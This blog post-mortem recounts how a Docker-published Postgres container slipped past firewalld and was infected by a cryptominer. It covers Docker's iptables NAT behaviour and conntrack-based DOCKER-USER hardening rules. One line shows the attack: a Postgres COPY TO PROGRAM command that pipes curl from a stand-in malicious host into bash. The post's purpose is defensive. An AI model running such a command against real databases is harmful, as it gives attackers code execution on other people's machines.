Docker on Linux futzes with its own iptables and so totally sidesteps firewalld/ufw.

Let's rewind.

Friday, October 31: I spun up a Postgres instance in a Docker container on one of my VMs for a proof-of-concept demo I'd be doing the next week. I had firewalld configured to deny incoming connections to port 5432, so I didn't even think about securing the database - it surely wouldn't be accessible on the public internet!

Look. What I did here was terrible. I copied and pasted the docker run --name some-postgres -e POSTGRES_PASSWORD=mysecretpassword -d postgres command from the Postgres image's Docker Hub page, added -p 5432:5432 to publish the port and called it a day.

This was lazy and bad, but I thought that access from the public internet would be blocked. Only another machine inside my tailnet was going to access it. No big deal.

Monday, November 3: Came back after a lovely weekend of not thinking about technology. But alas, the kinsing malware had made its way onto the machine and was obliterating my poor 1 vCPU to mine cryptocurrency.

But, how?

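Firstly, did you know PostgreSQL can run arbitrary shell commands on the machine it's running on? All it takes is a superuser login, and the image's default postgres user is one. Here "the machine" was the container, which still shares the VM's one vCPU, so that was plenty for a miner.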

COPY (SELECT '') TO PROGRAM 'curl http://a-very-naughty-server.com/malicious-crypto-miner-install-script.sh | bash';

That'll do it.

Did you also know that a flag like -p 5432:5432 binds to 0.0.0.0 on the host by default, an IPv4 address which represents all possible network interfaces - including any connected to the public internet?

Now, this 0.0.0.0 binding isn't something you have to worry about if you're using Docker Desktop on macOS, because you're actually running inside a VM. And that VM only interacts with your host network's localhost. But on Linux that would mean you've basically opened the door to the whole internet, unless you've got a firewall blocking that port.
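
One way to spot this on a running host is to look at the address each published port is bound to. The helper below is a minimal sketch, not anything Docker ships: find_wildcard_ports is a made-up name, and it assumes input lines shaped like "NAME PORTS", which is what docker ps prints when given the format string shown in the comment.

```shell
#!/bin/sh
# find_wildcard_ports (hypothetical helper): reads "NAME PORTS" lines on stdin
# and prints only the containers with a port published on every interface,
# i.e. bound to 0.0.0.0, [::], or the older ":::" spelling for IPv6.
find_wildcard_ports() {
    grep -E '(^|[[:space:],])(0\.0\.0\.0|\[::\]|::):[0-9-]+->' || true
}

# Intended use on a Docker host (not run here):
#   docker ps --format '{{.Names}} {{.Ports}}' | find_wildcard_ports
```

A container published with -p 127.0.0.1:5432:5432 would not show up in the output, because its port is bound to loopback only.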

Which is what I had though, right? That's literally firewalld. The clue is in the name!

$ sudo firewall-cmd --zone=public --list-all
public (default, active)
  target: DROP
  ingress-priority: 0
  egress-priority: 0
  icmp-block-inversion: no
  interfaces: ens3
  sources:
  services: dhcpv6-client http https mdns
  ports:
  protocols:
  forward: yes
  masquerade: no
  forward-ports:
  source-ports:
  icmp-blocks:
  rich rules:

Deny by default! Drop anything that's not http(s), mDNS or some thingamajig for IPv6! No port 5432 for you!

Actually, no.

Let's run a basic nginx container and expose container port 80 to port 8000 on the host:

$ docker run --rm -d -p 8000:80 nginx

And then from a totally different computer let's quite happily access that page:

$ curl 104.21.1.191:8000
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>

How is this madness happening? I've said it before, but: it shouldn't be getting through the firewall!?

Alright, let's do this. Hold on to something.

Let's remove some of Docker's functionality, namely its ability to set its own iptables rules and the userland-proxy. We won't worry about what the latter is in this article.

iptables is a very powerful tool that lets you fiddle around with netfilter, the packet-filtering framework inside the Linux kernel, which is all very terrifying and cool.

$ echo '{"iptables":false,"userland-proxy":false}' | sudo tee /etc/docker/daemon.json
{"iptables":false,"userland-proxy":false}

$ sudo systemctl restart docker

Now, finally, a curl 104.21.1.191:8000 does nothing. It's also broken a whole bunch of other important things to do with container networking, but we won't worry about that.

Let's figure out the IP of the container inside the docker0 bridge network:

$ docker inspect 1bba7bc8e37f -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}'
172.17.0.2

Now we can muck around with iptables ourselves so that requests to 104.21.1.191:8000 go to 172.17.0.2:80. To do this we'll be using Network Address Translation (NAT), which is how the majority of container networking is handled.

iptables is powerful and complex and probably not worth investing a great amount of time into figuring out, as it's been superseded by nftables.

# PREROUTING runs before any other routing decisions; the packet is on the way in
# -p specifies tcp protocol
# --dport is the destination port, so requests to port 8000
# -j jumps to destination NAT (dnat), which changes the packet's destination IP and/or port
# --to-destination specifies what the address ends up as: it's 172.17.0.2:80, aka where our container is running
sudo iptables -t nat -A PREROUTING -p tcp --dport 8000 -j DNAT --to-destination 172.17.0.2:80

# POSTROUTING runs after other routing decisions; the packet is on the way out 
# -s matches packets originating from 172.17.0.2, i.e. our container
# ! -o docker0 will only match packets that aren't trying to exit through the docker0 interface
# -j MASQUERADE will dynamically rewrite the source IP to the host's outgoing address
sudo iptables -t nat -A POSTROUTING -s 172.17.0.2/32 ! -o docker0 -j MASQUERADE

# Allows packets that are heading to the container to go through the firewall - this rule will occur _after_ the original packet has had its destination address changed
sudo iptables -A FORWARD -p tcp -d 172.17.0.2 --dport 80 -j ACCEPT

# Allows packets that are coming out of the container to go through the firewall
sudo iptables -A FORWARD -p tcp -s 172.17.0.2 --sport 80 -j ACCEPT

Docker doesn't add these exact rules, but these are easier to understand and it's close enough.

What we see here is that if a packet arrives at the machine asking for port 8000, the rules will transmogrify it to actually be for 172.17.0.2:80 and then it can be flung over to the docker0 bridge network. On the way out, the packet is modified once again so that it leaves looking as if it had come from the address the client originally called.

And we're back:

$ curl 104.21.1.191:8000
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>

We haven't messed with firewalld at all during this. firewalld is still configured to deny the request to port 8000.

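This is all fun and games, but why does it clash with firewalld? Well, firewalld (and ufw) also work by programming the kernel-level netfilter features, and the two sets of rules end up clashing. Roughly: Docker's DNAT rule rewrites the destination before any filtering happens, so the packet is forwarded on to the container rather than delivered to the host, and the port rules you gave firewalld for traffic to the host itself aren't the ones that decide its fate. Docker's use of iptables will essentially punch a hole straight through whatever you'd asked firewalld to be doing.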
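
To see the hole for yourself on a host where Docker still manages its own rules, you can pull the DNAT entries out of the nat table. This is a minimal sketch: list_dnat_rules is a made-up helper name, and it assumes the rule-per-line text that iptables -S prints, where --dport and --to-destination each appear followed by their value.

```shell
#!/bin/sh
# list_dnat_rules (hypothetical helper): reads `iptables -t nat -S` output on
# stdin and prints "PUBLISHED_PORT -> CONTAINER_ADDRESS" for every DNAT rule.
list_dnat_rules() {
    awk '/-j DNAT/ {
        dport = "?"; dest = "?"
        for (i = 1; i < NF; i++) {
            if ($i == "--dport") dport = $(i + 1)
            if ($i == "--to-destination") dest = $(i + 1)
        }
        print dport " -> " dest
    }'
}

# Intended use on a Docker host (not run here):
#   sudo iptables -t nat -S | list_dnat_rules
```

Every line it prints is a port that gets redirected to a container before the rules for host-bound traffic are consulted.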

This is why I got hacked - I basically left the front door wide open. I'm not complaining. I was rushing around and not paying attention. Docker has all the relevant information nestled within their documentation. Binding a database to 0.0.0.0 is obviously a bad idea, even if you're largely just mucking about. And not changing the password from the one that's listed on the Docker Hub page is literally asking for trouble.

What can you do about it?

If you don't want to start mucking around with your OS, you could follow a couple of simple rules:

Don't indiscriminately bind to 0.0.0.0
Don't open a port that you don't want to be open
Have your VPS behind a hardware firewall
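
For the first rule, docker run accepts an explicit host address in front of the port pair, for example -p 127.0.0.1:5432:5432. The wrapper below is a sketch for the forgetful, under stated assumptions: publish_spec is a made-up helper rather than anything Docker provides, and it only handles plain IPv4 addresses.

```shell
#!/bin/sh
# publish_spec HOST_IP HOST_PORT CONTAINER_PORT (hypothetical helper)
# Prints a value for docker run's -p flag, and refuses to produce one when the
# host address is missing or is a wildcard.
publish_spec() {
    case "$1" in
        ''|0.0.0.0|::|'[::]')
            echo "refusing to publish on all interfaces" >&2
            return 1
            ;;
    esac
    printf '%s:%s:%s\n' "$1" "$2" "$3"
}

# Intended use on a Docker host (not run here):
#   spec=$(publish_spec 127.0.0.1 5432 5432) && docker run -d -p "$spec" postgres
```

Swapping 127.0.0.1 for the machine's tailnet address would keep the database reachable from the tailnet while leaving the public interface alone.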

The trouble is, I'm extremely cheap and I don't want to change my VPS. And I'm also extremely forgetful, so I'll use -p 5432:5432 at the worst possible time.

Here's the functionality I want:

If there's a request for port 443 via the machine's public interface, that should be allowed
If there's a request for any other port via the machine's public interface, that should be denied
Containers should be able to call out to the internet with impunity, which will require receiving some packets back
Traffic on other interfaces, such as tailscale0, should be accepted by default

What I did: added some iptables rules to the DOCKER-USER chain in the filter table. This is a chain added by Docker as a hook for user customisation.

First we reset all our shenanigans:

$ sudo iptables --table filter --flush FORWARD
$ sudo iptables --table nat --flush PREROUTING
$ sudo iptables --table nat --flush POSTROUTING
$ sudo rm /etc/docker/daemon.json
$ sudo systemctl restart docker

And we could add these rules:

sudo iptables -I DOCKER-USER -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A DOCKER-USER -i ens3 -p tcp --dport 443 -j ACCEPT
sudo iptables -A DOCKER-USER -i ens3 -j DROP

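But that won't work, because NAT has already rewritten the destination port. By the time the DOCKER-USER rules run, --dport sees the container's port, not the port the request originally arrived on. A request to public port 8000 that's published to container port 443 would be accepted, and a request to public port 443 that's published to container port 80 would be dropped.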

Instead, this needs a stateful firewall. That's exactly what conntrack does. It's another kernel module provided as part of the netfilter project, and will let us have knowledge of what our NAT-modified packet looked like before the switcheroo. Let's sudo iptables --table filter --flush DOCKER-USER and give it another go. We want to match on the original destination port of the packet before we run it through NAT.

sudo iptables -I DOCKER-USER -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A DOCKER-USER -i ens3 -p tcp -m conntrack --ctorigdstport 443 -j ACCEPT
sudo iptables -A DOCKER-USER -i ens3 -j DROP
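
If you want to see what conntrack remembers about a connection, the conntrack command can list its table. The filter below is a sketch under a few assumptions: show_nat_mapping is a made-up name, the conntrack tool from conntrack-tools is installed, and each listed entry carries the original tuple (src, dst, sport, dport) first and the reply tuple second.

```shell
#!/bin/sh
# show_nat_mapping (hypothetical helper): reads `conntrack -L` entries on stdin
# and, for connections whose destination was rewritten, prints
# "ORIGINAL_DST:PORT -> ACTUAL_DST:PORT".
show_nat_mapping() {
    awk '{
        ns = nd = nsp = ndp = 0
        for (i = 1; i <= NF; i++) {
            if      ($i ~ /^src=/)   src[++ns]    = substr($i, 5)
            else if ($i ~ /^dst=/)   dst[++nd]    = substr($i, 5)
            else if ($i ~ /^sport=/) sport[++nsp] = substr($i, 7)
            else if ($i ~ /^dport=/) dport[++ndp] = substr($i, 7)
        }
        # The reply tuple comes *from* wherever the packet really ended up.
        if (ns >= 2 && ndp >= 1 && nsp >= 2) {
            before = dst[1] ":" dport[1]
            after  = src[2] ":" sport[2]
            if (before != after) print before " -> " after
        }
    }'
}

# Intended use on the host (not run here):
#   sudo conntrack -L -p tcp | show_nat_mapping
```

The port on the left-hand side is the one --ctorigdstport matches against, while a plain --dport in DOCKER-USER sees the port on the right.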

That appears to have given me the behaviour I want, and I haven't had any crypto miners installed on my machine since. Looking forward to seeing what the hackers have planned for Thanksgiving and Christmas.
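
One caveat: rules added by hand with iptables don't survive a reboot unless something saves and restores them. A low-tech option is to keep them in a small script that can be re-run. The sketch below only prints the commands so they can be reviewed first; print_docker_user_rules is a made-up name, and the interface and port are parameters because ens3 and 443 are specific to my machine.

```shell
#!/bin/sh
# print_docker_user_rules IFACE PORT (hypothetical helper)
# Prints the iptables commands from this article, starting from an empty
# DOCKER-USER chain so that re-running them doesn't pile up duplicates.
print_docker_user_rules() {
    iface=$1
    port=$2
    cat <<EOF
iptables -F DOCKER-USER
iptables -A DOCKER-USER -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -A DOCKER-USER -i $iface -p tcp -m conntrack --ctorigdstport $port -j ACCEPT
iptables -A DOCKER-USER -i $iface -j DROP
EOF
}

# Intended use once Docker is running (not run here):
#   print_docker_user_rules ens3 443 | sudo sh -e
```

The order matters: the RELATED,ESTABLISHED rule has to come before the DROP, otherwise replies to the containers' outbound connections would be discarded.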

Docker Got Me Hacked On Halloween
